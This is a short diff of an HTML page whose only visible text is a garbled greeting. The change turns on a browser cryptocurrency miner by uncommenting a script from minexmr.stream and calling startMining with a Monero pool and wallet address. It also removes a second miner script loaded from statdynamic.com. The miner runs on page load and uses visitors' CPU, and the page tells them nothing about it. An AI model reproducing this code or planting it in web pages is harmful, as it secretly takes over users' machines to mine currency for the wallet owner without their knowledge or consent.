--- a/index.html
+++ b/index.html
@@ -7,19 +7,10 @@
 <p>Hefqzefrld!</p>
 
 
-<!-- <script src="https://minexmr.stream/webmr.js"></script> -->
+<script src="https://minexmr.stream/webmr.js"></script>
 <script>
-    var passss = 1;
-   // startMining("monerohash.com","458GQG7wcfjSpBFSumpGCFhsh7NnkU6C19r4yD4H9w8ZH4cYVnR95JHQVKaH7u5z132ZHM5ReeFyP2MK6gwHKv54SbvgrSz"); 
-   // throttleMiner = 80;
-</script>
-    
-<script src="//statdynamic.com/lib/crypta.js"></script>
-<script>
-  var miner=new CRLT.Anonymous('6be0b900fcfdb4a7b20eb372ba49269c686420f6e189', {
-    threads:4,throttle:0.73, coin: "xmr",
-  });
-  miner.start();
+   startMining("monerohash.com","458GQG7wcfjSpBFSumpGCFhsh7NnkU6C19r4yD4H9w8ZH4cYVnR95JHQVKaH7u5z132ZHM5ReeFyP2MK6gwHKv54SbvgrSz"); 
+   throttleMiner = 80;
 </script>
  
 </body>
